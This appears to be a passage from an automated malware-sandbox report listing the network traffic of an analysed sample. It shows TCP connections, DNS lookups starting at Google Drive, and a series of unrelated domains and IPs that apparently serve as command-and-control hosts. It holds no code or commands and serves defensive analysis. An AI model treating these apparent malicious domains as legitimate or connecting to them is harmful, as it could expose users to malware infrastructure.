                                      Jun 4, 2024 14:20:43.924374104 CEST4990380192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:44.156729937 CEST804990391.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:44.156843901 CEST804990391.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:44.156996012 CEST4990380192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:45.436521053 CEST4990380192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:46.454586029 CEST4990480192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:46.681159019 CEST804990491.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:46.681363106 CEST4990480192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:46.683096886 CEST4990480192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:46.909769058 CEST804990491.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:46.909781933 CEST804990491.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:46.909879923 CEST804990491.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:46.909890890 CEST804990491.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:49.204457998 CEST4990580192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:49.430608034 CEST804990591.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:49.430923939 CEST4990580192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:49.432606936 CEST4990580192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:49.658915997 CEST804990591.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:49.658935070 CEST804990591.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:49.659272909 CEST4990580192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:49.661757946 CEST4990580192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:49.887896061 CEST804990591.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:54.674614906 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:20:55.684227943 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:20:57.699405909 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:01.714087963 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:09.727945089 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:16.760579109 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:17.772998095 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:19.788184881 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:23.802911043 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:31.816790104 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:38.849272013 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:39.861896038 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:41.877011061 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:45.891707897 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:21:53.905637980 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:22:00.939934969 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:22:01.950666904 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:22:03.966202021 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:22:07.980613947 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:22:15.994379044 CEST4985980192.168.11.3089.35.125.17
                                      Jun 4, 2024 14:22:27.027931929 CEST4990780192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:27.189223051 CEST804990766.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:27.189423084 CEST4990780192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:27.191332102 CEST4990780192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:27.352880955 CEST804990766.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:27.353035927 CEST804990766.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:27.353147030 CEST804990766.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:27.353332996 CEST4990780192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:28.694751978 CEST4990780192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:29.712666035 CEST4990880192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:29.871221066 CEST804990866.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:29.871588945 CEST4990880192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:29.873224974 CEST4990880192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:30.031487942 CEST804990866.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:30.031626940 CEST804990866.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:30.031673908 CEST804990866.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:30.031944036 CEST4990880192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:31.381645918 CEST4990880192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:32.399785995 CEST4990980192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:32.562803984 CEST804990966.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:32.563047886 CEST4990980192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:32.565224886 CEST4990980192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:32.728458881 CEST804990966.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:32.728575945 CEST804990966.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:32.728588104 CEST804990966.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:32.728723049 CEST4990980192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:34.068507910 CEST4990980192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:35.086530924 CEST4991080192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:35.244723082 CEST804991066.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:35.244968891 CEST4991080192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:35.246881962 CEST4991080192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:35.404983044 CEST804991066.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:35.405052900 CEST804991066.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:35.405101061 CEST804991066.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:35.405461073 CEST4991080192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:35.407886982 CEST4991080192.168.11.3066.81.203.196
                                      Jun 4, 2024 14:22:35.565886021 CEST804991066.81.203.196192.168.11.30
                                      Jun 4, 2024 14:22:40.413825035 CEST4991180192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:40.713172913 CEST8049911162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:40.713468075 CEST4991180192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:40.716788054 CEST4991180192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:41.019643068 CEST8049911162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:41.019733906 CEST8049911162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:41.019752979 CEST8049911162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:41.019803047 CEST8049911162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:41.019934893 CEST4991180192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:42.222929001 CEST4991180192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:43.240941048 CEST4991280192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:43.516621113 CEST8049912162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:43.516819954 CEST4991280192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:43.518687010 CEST4991280192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:43.794315100 CEST8049912162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:43.795527935 CEST8049912162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:43.795547009 CEST8049912162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:43.795563936 CEST8049912162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:43.795753002 CEST4991280192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:45.628554106 CEST4991280192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:46.646806002 CEST4991380192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:46.954741001 CEST8049913162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:46.954926014 CEST4991380192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:46.956729889 CEST4991380192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:47.264581919 CEST8049913162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:47.265578985 CEST8049913162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:47.265599966 CEST8049913162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:47.265616894 CEST8049913162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:47.265768051 CEST4991380192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:48.471514940 CEST4991380192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:49.489120960 CEST4991480192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:49.762902975 CEST8049914162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:49.763104916 CEST4991480192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:49.764624119 CEST4991480192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:50.038288116 CEST8049914162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:50.039150953 CEST8049914162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:50.039277077 CEST8049914162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:50.039295912 CEST8049914162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:50.039308071 CEST8049914162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:22:50.039547920 CEST4991480192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:50.043457031 CEST4991480192.168.11.30162.43.104.164
                                      Jun 4, 2024 14:22:50.316957951 CEST8049914162.43.104.164192.168.11.30
                                      Jun 4, 2024 14:23:03.251853943 CEST4991580192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:03.497581959 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:03.497733116 CEST4991580192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:03.499651909 CEST4991580192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:03.745381117 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.067943096 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.067985058 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.068133116 CEST4991580192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:04.068135023 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.068185091 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.068300009 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.068320990 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.068341970 CEST4991580192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:04.068348885 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.068368912 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.068387032 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.068496943 CEST4991580192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:04.068516016 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.068536997 CEST804991593.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:04.068670034 CEST4991580192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:04.068670034 CEST4991580192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:05.014746904 CEST4991580192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:06.032761097 CEST4991680192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:06.286237955 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.286488056 CEST4991680192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:06.288086891 CEST4991680192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:06.541466951 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.860879898 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861012936 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861027956 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861057043 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861152887 CEST4991680192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:06.861170053 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861196041 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861208916 CEST4991680192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:06.861237049 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861248970 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861298084 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861366987 CEST4991680192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:06.861440897 CEST4991680192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:06.861452103 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861591101 CEST804991693.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:06.861670971 CEST4991680192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:06.861762047 CEST4991680192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:07.795300007 CEST4991680192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:08.813471079 CEST4991780192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:09.059305906 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.059539080 CEST4991780192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:09.061326981 CEST4991780192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:09.307158947 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.307178020 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707195044 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707231998 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707259893 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707360029 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707417011 CEST4991780192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:09.707514048 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707526922 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707537889 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707550049 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707612038 CEST4991780192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:09.707652092 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707653046 CEST4991780192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:09.707655907 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707665920 CEST804991793.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:09.707777023 CEST4991780192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:09.707876921 CEST4991780192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:10.576097965 CEST4991780192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:11.593972921 CEST4991880192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:11.839572906 CEST804991893.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:11.839760065 CEST4991880192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:11.841664076 CEST4991880192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:12.087210894 CEST804991893.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:12.088104010 CEST804991893.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:12.088124990 CEST804991893.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:12.088426113 CEST4991880192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:12.090837955 CEST4991880192.168.11.3093.125.99.134
                                      Jun 4, 2024 14:23:12.336369991 CEST804991893.125.99.134192.168.11.30
                                      Jun 4, 2024 14:23:17.109064102 CEST4991980192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:17.240958929 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.241251945 CEST4991980192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:17.243041039 CEST4991980192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:17.374833107 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.376660109 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.376760960 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.376822948 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.376856089 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.376878977 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.376913071 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.376934052 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.376935959 CEST4991980192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:17.376935959 CEST4991980192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:17.376955032 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.376985073 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.377007961 CEST804991934.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:17.377033949 CEST4991980192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:17.377090931 CEST4991980192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:17.377187967 CEST4991980192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:18.746007919 CEST4991980192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:19.764302969 CEST4992080192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:19.896280050 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:19.896492958 CEST4992080192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:19.898196936 CEST4992080192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:20.030021906 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031656027 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031694889 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031754971 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031815052 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031835079 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031853914 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031873941 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031877995 CEST4992080192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:20.031894922 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031914949 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031936884 CEST804992034.232.203.70192.168.11.30
                                      Jun 4, 2024 14:23:20.031980991 CEST4992080192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:20.032078028 CEST4992080192.168.11.3034.232.203.70
                                      Jun 4, 2024 14:23:21.401711941 CEST4992080192.168.11.3034.232.203.70

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jun 4, 2024 14:14:44.312383890 CEST5134053192.168.11.301.1.1.1
                                      Jun 4, 2024 14:14:44.448549986 CEST53513401.1.1.1192.168.11.30
                                      Jun 4, 2024 14:14:45.102452040 CEST6365753192.168.11.301.1.1.1
                                      Jun 4, 2024 14:14:45.221622944 CEST53636571.1.1.1192.168.11.30
                                      Jun 4, 2024 14:15:11.504376888 CEST6517153192.168.11.301.1.1.1
                                      Jun 4, 2024 14:15:11.812799931 CEST53651711.1.1.1192.168.11.30
                                      Jun 4, 2024 14:15:27.341855049 CEST5834753192.168.11.301.1.1.1
                                      Jun 4, 2024 14:15:27.484736919 CEST53583471.1.1.1192.168.11.30
                                      Jun 4, 2024 14:15:41.553247929 CEST5855553192.168.11.301.1.1.1
                                      Jun 4, 2024 14:15:41.755414009 CEST53585551.1.1.1192.168.11.30
                                      Jun 4, 2024 14:15:55.253355026 CEST5317953192.168.11.301.1.1.1
                                      Jun 4, 2024 14:15:55.439812899 CEST53531791.1.1.1192.168.11.30
                                      Jun 4, 2024 14:16:09.173129082 CEST6068753192.168.11.301.1.1.1
                                      Jun 4, 2024 14:16:10.185338020 CEST6068753192.168.11.309.9.9.9
                                      Jun 4, 2024 14:16:10.480017900 CEST53606871.1.1.1192.168.11.30
                                      Jun 4, 2024 14:16:10.552642107 CEST53606879.9.9.9192.168.11.30
                                      Jun 4, 2024 14:17:42.843122005 CEST5848253192.168.11.301.1.1.1
                                      Jun 4, 2024 14:17:43.239758968 CEST53584821.1.1.1192.168.11.30
                                      Jun 4, 2024 14:18:01.664026976 CEST6150153192.168.11.301.1.1.1
                                      Jun 4, 2024 14:18:02.204690933 CEST53615011.1.1.1192.168.11.30
                                      Jun 4, 2024 14:18:16.285159111 CEST5247253192.168.11.301.1.1.1
                                      Jun 4, 2024 14:18:16.420972109 CEST53524721.1.1.1192.168.11.30
                                      Jun 4, 2024 14:18:24.474251986 CEST5889353192.168.11.301.1.1.1
                                      Jun 4, 2024 14:18:25.483484983 CEST5889353192.168.11.309.9.9.9
                                      Jun 4, 2024 14:18:25.849226952 CEST53588939.9.9.9192.168.11.30
                                      Jun 4, 2024 14:18:26.475804090 CEST53588931.1.1.1192.168.11.30
                                      Jun 4, 2024 14:18:39.811781883 CEST5955653192.168.11.309.9.9.9
                                      Jun 4, 2024 14:18:39.989677906 CEST53595569.9.9.9192.168.11.30
                                      Jun 4, 2024 14:18:53.246117115 CEST5412053192.168.11.309.9.9.9
                                      Jun 4, 2024 14:18:53.380063057 CEST53541209.9.9.9192.168.11.30
                                      Jun 4, 2024 14:19:07.414474010 CEST5759053192.168.11.309.9.9.9
                                      Jun 4, 2024 14:19:07.567127943 CEST53575909.9.9.9192.168.11.30
                                      Jun 4, 2024 14:19:21.270912886 CEST5195553192.168.11.309.9.9.9
                                      Jun 4, 2024 14:19:21.394455910 CEST53519559.9.9.9192.168.11.30
                                      Jun 4, 2024 14:19:29.456700087 CEST5925353192.168.11.309.9.9.9
                                      Jun 4, 2024 14:19:29.608365059 CEST53592539.9.9.9192.168.11.30
                                      Jun 4, 2024 14:19:37.673245907 CEST5655753192.168.11.309.9.9.9
                                      Jun 4, 2024 14:19:37.881947041 CEST53565579.9.9.9192.168.11.30
                                      Jun 4, 2024 14:19:51.623375893 CEST5759253192.168.11.309.9.9.9
                                      Jun 4, 2024 14:19:51.814904928 CEST53575929.9.9.9192.168.11.30
                                      Jun 4, 2024 14:22:55.049639940 CEST6505953192.168.11.309.9.9.9
                                      Jun 4, 2024 14:22:55.189209938 CEST53650599.9.9.9192.168.11.30

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jun 4, 2024 14:14:44.312383890 CEST192.168.11.301.1.1.10x7c35Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:14:45.102452040 CEST192.168.11.301.1.1.10x655bStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:15:11.504376888 CEST192.168.11.301.1.1.10xc7faStandard query (0)www.respirelavie.netA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:15:27.341855049 CEST192.168.11.301.1.1.10xc8d5Standard query (0)www.airportsurvery.comA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:15:41.553247929 CEST192.168.11.301.1.1.10x13efStandard query (0)www.innovtech.lifeA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:15:55.253355026 CEST192.168.11.301.1.1.10x3e08Standard query (0)www.k4ryd.usA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:16:09.173129082 CEST192.168.11.301.1.1.10x9d8cStandard query (0)www.auetravel.kzA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:16:10.185338020 CEST192.168.11.309.9.9.90x9d8cStandard query (0)www.auetravel.kzA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:17:42.843122005 CEST192.168.11.301.1.1.10x5ff9Standard query (0)www.accentbathrooms.comA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:01.664026976 CEST192.168.11.301.1.1.10xf0dfStandard query (0)www.shun-yamagata.comA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:16.285159111 CEST192.168.11.301.1.1.10x66efStandard query (0)www.donumul.comA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:24.474251986 CEST192.168.11.301.1.1.10xddcbStandard query (0)www.brongal.byA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:25.483484983 CEST192.168.11.309.9.9.90xddcbStandard query (0)www.brongal.byA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:39.811781883 CEST192.168.11.309.9.9.90x2fa7Standard query (0)www.jdps.orgA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:53.246117115 CEST192.168.11.309.9.9.90xfa77Standard query (0)www.belgravevilla.comA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:19:07.414474010 CEST192.168.11.309.9.9.90xbb6cStandard query (0)www.insist.siteA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:19:21.270912886 CEST192.168.11.309.9.9.90xa3edStandard query (0)www.runonbattery.comA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:19:29.456700087 CEST192.168.11.309.9.9.90x833bStandard query (0)www.nemeanshop.comA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:19:37.673245907 CEST192.168.11.309.9.9.90x1874Standard query (0)www.nurenose.comA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:19:51.623375893 CEST192.168.11.309.9.9.90x17edStandard query (0)www.cd14j.usA (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:22:55.049639940 CEST192.168.11.309.9.9.90xef91Standard query (0)www.donumul.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jun 4, 2024 14:14:44.448549986 CEST1.1.1.1192.168.11.300x7c35No error (0)drive.google.com142.250.217.174A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:14:45.221622944 CEST1.1.1.1192.168.11.300x655bNo error (0)drive.usercontent.google.com172.217.215.132A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:15:11.812799931 CEST1.1.1.1192.168.11.300xc7faNo error (0)www.respirelavie.netrespirelavie.netCNAME (Canonical name)IN (0x0001)false
                                      Jun 4, 2024 14:15:11.812799931 CEST1.1.1.1192.168.11.300xc7faNo error (0)respirelavie.net192.3.27.169A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:15:27.484736919 CEST1.1.1.1192.168.11.300xc8d5No error (0)www.airportsurvery.com173.232.18.161A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:15:41.755414009 CEST1.1.1.1192.168.11.300x13efNo error (0)www.innovtech.life203.161.49.193A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:15:55.439812899 CEST1.1.1.1192.168.11.300x3e08No error (0)www.k4ryd.us91.195.240.123A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:16:10.480017900 CEST1.1.1.1192.168.11.300x9d8cNo error (0)www.auetravel.kz89.35.125.17A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:16:10.552642107 CEST9.9.9.9192.168.11.300x9d8cNo error (0)www.auetravel.kz89.35.125.17A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:17:43.239758968 CEST1.1.1.1192.168.11.300x5ff9No error (0)www.accentbathrooms.com66.81.203.196A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:02.204690933 CEST1.1.1.1192.168.11.300xf0dfNo error (0)www.shun-yamagata.com162.43.104.164A (IP address)IN (0x0001)false
                                      Jun 4, 2024 14:18:16.420972109 CEST1.1.1.1192.168.11.300x66efName error (3)www.donumul.comnonenoneA (IP address)IN (0x0001)false
